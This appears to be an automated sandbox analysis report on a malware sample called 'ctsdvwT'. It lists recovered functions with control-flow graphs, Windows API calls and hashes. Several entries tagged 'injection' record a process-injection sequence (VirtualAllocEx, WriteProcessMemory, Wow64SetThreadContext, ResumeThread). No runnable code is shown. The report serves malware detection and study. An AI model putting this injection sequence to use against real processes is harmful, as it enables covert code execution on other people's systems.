                                            control_flow_graph 441 13db0e8-13db0f7 442 13db0f9-13db106 call 13dada0 441->442 443 13db123-13db127 441->443 449 13db11c 442->449 450 13db108 442->450 445 13db129-13db133 443->445 446 13db13b-13db17c 443->446 445->446 452 13db17e-13db186 446->452 453 13db189-13db197 446->453 449->443 498 13db10e call 13db370 450->498 499 13db10e call 13db380 450->499 452->453 454 13db199-13db19e 453->454 455 13db1bb-13db1bd 453->455 457 13db1a9 454->457 458 13db1a0-13db1a7 call 13dadac 454->458 460 13db1c0-13db1c7 455->460 456 13db114-13db116 456->449 459 13db258-13db318 456->459 462 13db1ab-13db1b9 457->462 458->462 491 13db31a-13db31d 459->491 492 13db320-13db34b GetModuleHandleW 459->492 463 13db1c9-13db1d1 460->463 464 13db1d4-13db1db 460->464 462->460 463->464 467 13db1dd-13db1e5 464->467 468 13db1e8-13db1f1 call 13dadbc 464->468 467->468 472 13db1fe-13db203 468->472 473 13db1f3-13db1fb 468->473 474 13db205-13db20c 472->474 475 13db221-13db225 472->475 473->472 474->475 477 13db20e-13db21e call 13dadcc call 13daddc 474->477 496 13db228 call 13db670 475->496 497 13db228 call 13db680 475->497 477->475 480 13db22b-13db22e 482 13db251-13db257 480->482 483 13db230-13db24e 480->483 483->482 491->492 493 13db34d-13db353 492->493 494 13db354-13db368 492->494 493->494 496->480 497->480 498->456 499->456
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 8bbed93685dbe9b60a2df57b2613536b673e8b5e4426985d518c97c7f40db901
                                            • Instruction ID: 1517263fad3924d597f64d44aa90a04cfab450577c4d8050f44694c04f9b33a3
                                            • Opcode Fuzzy Hash: 8bbed93685dbe9b60a2df57b2613536b673e8b5e4426985d518c97c7f40db901
                                            • Instruction Fuzzy Hash: 65715571A00B058FD724DF6AE54175ABBF5FF89308F008A2DD48ADBA54DB34E949CB90
                                            Function 013DAFC8 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 610 13dafc8-13dafd5 612 13db00e-13db010 610->612 613 13dafd7-13dafdb 610->613 618 13db047-13db04e 612->618 619 13db012-13db03f 612->619 614 13dd5c8-13dd65c DuplicateHandle 613->614 616 13dd65e-13dd664 614->616 617 13dd665-13dd682 614->617 616->617 620 13db05d-13db065 618->620 621 13db050-13db05b 618->621 619->618 625 13db068-13db071 620->625 621->625 626 13db0b7-13db0c2 625->626 627 13db073-13db077 625->627 630 13db0cf-13db0d4 626->630 628 13db0ae-13db0b5 627->628 629 13db079-13db0a6 627->629 628->626 632 13db0c4-13db0cc 628->632 629->628 632->630
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013DD58E,?,?,?,?,?), ref: 013DD64F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 8c6eabc1857b43e88ae629254a7ca0f877762c0a55a6201b08a0734a6a07543b
                                            • Instruction ID: 67d87bb3f1dd8ba5ba1bca53e01ae99942e5245f0b6600ad3a8d2d618d96bf2a
                                            • Opcode Fuzzy Hash: 8c6eabc1857b43e88ae629254a7ca0f877762c0a55a6201b08a0734a6a07543b
                                            • Instruction Fuzzy Hash: FC4189719003089FDB15CFA9D484B9ABFF5FF45318F108459E155AB261C3BAE949CBA0
                                            Function 013D590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 635 13d590c-13d5916 636 13d5918-13d59d9 CreateActCtxA 635->636 638 13d59db-13d59e1 636->638 639 13d59e2-13d5a3c 636->639 638->639 646 13d5a3e-13d5a41 639->646 647 13d5a4b-13d5a4f 639->647 646->647 648 13d5a51-13d5a5d 647->648 649 13d5a60 647->649 648->649 651 13d5a61 649->651 651->651
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013D59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c4df5cbaacb932032b868a29d5ac20d6308459cc6cb7475ee3f840e51175150c
                                            • Instruction ID: f6631fcccb94a16df2e5cb5a91cbf5d94ef7465cae68f8df5539ba157b018303
                                            • Opcode Fuzzy Hash: c4df5cbaacb932032b868a29d5ac20d6308459cc6cb7475ee3f840e51175150c
                                            • Instruction Fuzzy Hash: 3741F3B1C00719CFDB25CFA9C884B9DBBF5BF49304F20805AD418AB254DB75694ACF91
                                            Function 013D4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 652 13d4514-13d59d9 CreateActCtxA 655 13d59db-13d59e1 652->655 656 13d59e2-13d5a3c 652->656 655->656 663 13d5a3e-13d5a41 656->663 664 13d5a4b-13d5a4f 656->664 663->664 665 13d5a51-13d5a5d 664->665 666 13d5a60 664->666 665->666 668 13d5a61 666->668 668->668
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013D59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 28ca89ab1b8baec3ce37ebd442cb2749d8526cd50590df945df7bdc51682cab9
                                            • Instruction ID: 71445d6f5fd75f8e7287215957da189564fdd659a340b23c6c339e4cad3d402d
                                            • Opcode Fuzzy Hash: 28ca89ab1b8baec3ce37ebd442cb2749d8526cd50590df945df7bdc51682cab9
                                            • Instruction Fuzzy Hash: 2241E0B1C0071DCADB24DFA9C884A9DBBF5BF49308F20806AD418AB255DB75694ACF91
                                            Function 07A576B0 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 669 7a576b0-7a57706 672 7a57716-7a57755 WriteProcessMemory 669->672 673 7a57708-7a57714 669->673 675 7a57757-7a5775d 672->675 676 7a5775e-7a5778e 672->676 673->672 675->676
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A57748
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ec5553585a1b42d7081a577785e9f9763a02f8f7810367db837d36cec61fa056
                                            • Instruction ID: e9cfda617418930b59926d7e15d570c9b25d0b54cfa0fdda0e815d008ed31e82
                                            • Opcode Fuzzy Hash: ec5553585a1b42d7081a577785e9f9763a02f8f7810367db837d36cec61fa056
                                            • Instruction Fuzzy Hash: 192137B59003599FCB10DFA9D881BEEBBF5FF48310F10842AE919A7240D7789945CBA0
                                            Function 07A576B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 680 7a576b8-7a57706 682 7a57716-7a57755 WriteProcessMemory 680->682 683 7a57708-7a57714 680->683 685 7a57757-7a5775d 682->685 686 7a5775e-7a5778e 682->686 683->682 685->686
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A57748
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: ab3ec374122964f745c64ffee5ecdfc6c7f1da8e1546fff0a04e27b279373e5a
                                            • Instruction ID: b6935a02ba84a0131cb343fce6c0e8deb1d7aae1eb007a8bfb8bbc9ea21333c5
                                            • Opcode Fuzzy Hash: ab3ec374122964f745c64ffee5ecdfc6c7f1da8e1546fff0a04e27b279373e5a
                                            • Instruction Fuzzy Hash: EE214AB59003199FCB10DFA9C985BEEBBF5FF48310F10842AE919A7240D7789944CFA0
                                            Function 07A577A1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 690 7a577a1-7a57835 ReadProcessMemory 694 7a57837-7a5783d 690->694 695 7a5783e-7a5786e 690->695 694->695
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57828
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 0f59b7b7d787ebac44c498cb324d33db2543d2492165a3e552be10381fd4283d
                                            • Instruction ID: 7fb9aec7e0b5d65af5d5cec28fa141b6278cc6e29e436c9ef02256aafb351a5f
                                            • Opcode Fuzzy Hash: 0f59b7b7d787ebac44c498cb324d33db2543d2492165a3e552be10381fd4283d
                                            • Instruction Fuzzy Hash: 3C2116B18003599FCB10DFAAC845AEEFBF5FF48310F50842AE969A7250D7389945CBA1
                                            Function 07A570E1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 705 7a570e1-7a57133 707 7a57135-7a57141 705->707 708 7a57143-7a57173 Wow64SetThreadContext 705->708 707->708 710 7a57175-7a5717b 708->710 711 7a5717c-7a571ac 708->711 710->711
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A57166
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 44f9bfca2446b13b97ee761a5fa832a9808001672c51c414c1bc8cbd89ed4455
                                            • Instruction ID: c855ce947d0f7c654f7ec6e7040510f772dfe5ac25a77d96b6c31e0ca13f338d
                                            • Opcode Fuzzy Hash: 44f9bfca2446b13b97ee761a5fa832a9808001672c51c414c1bc8cbd89ed4455
                                            • Instruction Fuzzy Hash: E12138B1D002198FDB10DFAAC4857EEBBF5FF89314F14842AD969A7250CB789944CFA1
                                            Function 013DAFD4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 699 13dafd4-13dd65c DuplicateHandle 701 13dd65e-13dd664 699->701 702 13dd665-13dd682 699->702 701->702
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013DD58E,?,?,?,?,?), ref: 013DD64F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 821936cf634842aeb63b56454207b4536564b1b376da3511d3e5e36bfe21a846
                                            • Instruction ID: 7808128280ebd659d2c1ced79f4b996180bce3ceab7e234d711400430e158fb7
                                            • Opcode Fuzzy Hash: 821936cf634842aeb63b56454207b4536564b1b376da3511d3e5e36bfe21a846
                                            • Instruction Fuzzy Hash: 0F21E4B59002089FDB10CF9AD584AEEBFF9FB48324F14845AE918A3350D378A954CFA5
                                            Function 07A577A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A57828
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: cf40b01dda8ecf095af615889a78a4b4f932e20b5d0fe3b47c86b109d8934515
                                            • Instruction ID: d7f0235bad035ced4bbbce4caf335a8eabf3fdaafc355af96708056b502eb5ad
                                            • Opcode Fuzzy Hash: cf40b01dda8ecf095af615889a78a4b4f932e20b5d0fe3b47c86b109d8934515
                                            • Instruction Fuzzy Hash: 712139B1C003499FCB10DFAAC840AEEFBF5FF48310F50842AE919A7250D7389944CBA1
                                            Function 07A570E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 715 7a570e8-7a57133 717 7a57135-7a57141 715->717 718 7a57143-7a57173 Wow64SetThreadContext 715->718 717->718 720 7a57175-7a5717b 718->720 721 7a5717c-7a571ac 718->721 720->721
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A57166
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 4bcee8e570628949d9edac47f3a4f90c8a0af0e12ce57df68527ae37294ca8e0
                                            • Instruction ID: 55f89483d4adb1733492e1aa9ad5d22a761667548dc449fad3b092a662b0900a
                                            • Opcode Fuzzy Hash: 4bcee8e570628949d9edac47f3a4f90c8a0af0e12ce57df68527ae37294ca8e0
                                            • Instruction Fuzzy Hash: 192137B19002098FDB10DFAAC4857EEBBF5FF88310F10842AD519A7240CB789944CFA1
                                            Function 013DD5C1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013DD58E,?,?,?,?,?), ref: 013DD64F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: bef05a717dc2162f85da767e26ecf900ebf6395ac77a84774b3f361c4c05f26a
                                            • Instruction ID: 26be23467e16bd78e40f114a89650ebc3bd794e964e06e7b88e8043b30c3fdf7
                                            • Opcode Fuzzy Hash: bef05a717dc2162f85da767e26ecf900ebf6395ac77a84774b3f361c4c05f26a
                                            • Instruction Fuzzy Hash: E021F3B6D002089FDB10CFA9D584AEEBBF4FF08320F14841AE918A3350D378A944CFA0
                                            Function 07A56BF8 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 677e38deb256059d226caef63753aa5c095f1d19ef246eb51404153f267ab5d8
                                            • Instruction ID: ae710c62a2356247b2c6c2fddc0241bf1ef72620504f6a7c2a0af5a29631c081
                                            • Opcode Fuzzy Hash: 677e38deb256059d226caef63753aa5c095f1d19ef246eb51404153f267ab5d8
                                            • Instruction Fuzzy Hash: 46115BB18003498FCB20DFAAC4457EEFFF4EF89714F208459D559A7240CB39A545CBA1
                                            Function 07A575F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57666
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 59baff3c583f9075b74452871270071083b9bbfad2681583d7323de7625835a4
                                            • Instruction ID: 3f23f57b951e93c4d16a3c7d45009348bd6a9c67d4c31378359c2836079a0053
                                            • Opcode Fuzzy Hash: 59baff3c583f9075b74452871270071083b9bbfad2681583d7323de7625835a4
                                            • Instruction Fuzzy Hash: 4E1107B59002499FCB10DFAAC845AEEBFF5EF88310F148419E529A7250C779A544CFA1
                                            Function 07A575F1 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A57666
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: bddbc52f5b8aecf808a917a3e8497cc65d94f44e2ceaff97f4df2c2f9f956394
                                            • Instruction ID: d9543042b561c83224da27e64409452724fbe4cfbf437eec4343ffa8df1501c0
                                            • Opcode Fuzzy Hash: bddbc52f5b8aecf808a917a3e8497cc65d94f44e2ceaff97f4df2c2f9f956394
                                            • Instruction Fuzzy Hash: 0C1167B58002498FCB20DFA9C940AEEFBF5FF48310F24881AD929A7250C739A550CFA1
                                            Function 013DADA0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,013DB104), ref: 013DB33E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276038947.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_13d0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: edcc77ab44d15d170de074b7fa914be818f05e5c77749603f7da8efa51f4d378
                                            • Instruction ID: 069b31f2c6b532d524a966bbf41bc2914ab0e5695fc26786dc30412a6a92505b
                                            • Opcode Fuzzy Hash: edcc77ab44d15d170de074b7fa914be818f05e5c77749603f7da8efa51f4d378
                                            • Instruction Fuzzy Hash: 55113FB6C003498FDB10CF9AD444ADEFBF8EB89214F11802AD929A7200C379A548CFA1
                                            Function 07A56C00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: c9e7af160d573b2b7289e3f09b2820abf62e1bed00be7248378eb12cbf129d92
                                            • Instruction ID: 5ac60b2be5a939d935090c8c007927fc1e1633fcfb3f8b866e3a9309f8436d2c
                                            • Opcode Fuzzy Hash: c9e7af160d573b2b7289e3f09b2820abf62e1bed00be7248378eb12cbf129d92
                                            • Instruction Fuzzy Hash: 3D1128B19003498BCB10DFAAC4457EEFBF5EF88714F208419D519A7240CB79A544CBA5
                                            Function 07A58E38 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A83D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 3a9dba25b0b26ba5930a33243a57b077457633c1c75c91b4a75bbb11f24dc0a2
                                            • Instruction ID: de0e8b9deb8d22ee4567949c58efa41304c87dd94387dfec4b2428db47ce7967
                                            • Opcode Fuzzy Hash: 3a9dba25b0b26ba5930a33243a57b077457633c1c75c91b4a75bbb11f24dc0a2
                                            • Instruction Fuzzy Hash: 231106B59003499FCB10DF99D485BDEBFF8FB49310F10845AE929A7240C379A944CFA1
                                            Function 07A5A7D8 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07A5A83D
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2286966039.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7a50000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: b38d11bd5512fa140be5ea907cbecd314ee223cc9d8cb2af2d63983f58ff598b
                                            • Instruction ID: f7eedf76b387697ef044358816ae2074a607e2afd4064dd1c1ec0503285ade68
                                            • Opcode Fuzzy Hash: b38d11bd5512fa140be5ea907cbecd314ee223cc9d8cb2af2d63983f58ff598b
                                            • Instruction Fuzzy Hash: 0811F2B58003499FCB10DF99D585BDEBBF4FB48310F10841AD928A7240C379A544CFA1
                                            Function 0131D3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0e0bd50745a063a39dc34c4b34fc6f163462f824fbf132a22a5125d8cf48d6a9
                                            • Instruction ID: ce128497aa0f94030b9fe0f9df0e36d0277169303eed3b1d949c8767585158a5
                                            • Opcode Fuzzy Hash: 0e0bd50745a063a39dc34c4b34fc6f163462f824fbf132a22a5125d8cf48d6a9
                                            • Instruction Fuzzy Hash: E3216D71140204DFDB09DF54D5C4F56BF69FB89318F20C56DD9091B25ACB3AE406C7A1
                                            Function 0131D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa5648877da7a372822be1b2fe60767343e98d1cc1d2270a1ce41aaa9143a595
                                            • Instruction ID: 73c739284624a39ef76508e6fa4a1c8a5e0131e8c39d4e6446084833449d33df
                                            • Opcode Fuzzy Hash: fa5648877da7a372822be1b2fe60767343e98d1cc1d2270a1ce41aaa9143a595
                                            • Instruction Fuzzy Hash: 85210371500244DFDB19DF58D9C8F26BF69FB8931CF20C569E9090B25AC33AD416CAA2
                                            Function 0132D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6210e7ce7921ca0c8118c0670e51a562f4298b248f94ba6630862ec391d964d
                                            • Instruction ID: cac67b92dcfd968e225f97e1489056c75bac63c043a3e58768039cf5a46608cf
                                            • Opcode Fuzzy Hash: e6210e7ce7921ca0c8118c0670e51a562f4298b248f94ba6630862ec391d964d
                                            • Instruction Fuzzy Hash: 74210471504304EFDB05EFA8D9C0F26BBA9FB89328F20C56DE9094B356C33AD406CA61
                                            Function 0132D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a768fbe7e232b835bc483bfcb3bcc10b37c8d3db746631870be5cba7cee107e
                                            • Instruction ID: 745e7e6cda2c55b302906a02fa23f87b42f27221e99c22abffe7b9aeb920d69e
                                            • Opcode Fuzzy Hash: 5a768fbe7e232b835bc483bfcb3bcc10b37c8d3db746631870be5cba7cee107e
                                            • Instruction Fuzzy Hash: A2212571504244DFCB15EF68D980B16BF65FB84318F20C56DD90A0B366C33ED407CAA1
                                            Function 0132D006 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275532823.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_132d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7140314511e2d230085ad081613997d7663ae01684f691b77f3269347ebecf2a
                                            • Instruction ID: c4b07fd75b1f1f06f98f97c859e4ec2a7f678133bfee20f961baf5835b1a4629
                                            • Opcode Fuzzy Hash: 7140314511e2d230085ad081613997d7663ae01684f691b77f3269347ebecf2a
                                            • Instruction Fuzzy Hash: F12180755083809FCB03DF64D994711BF71EB46218F28C5DAD8898F2A7C33A981ACB62
                                            Function 0131D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 85a8e014354435e5e0828a24bdd125b76e5a7fc1e4a6368c51d9aa0a6b30afc9
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: AF110372404280CFCB06CF54D5C4B16BF71FB88318F24C6A9D9490B25BC336D45ACBA2
                                            Function 0131D3D3 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2275423730.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_131d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
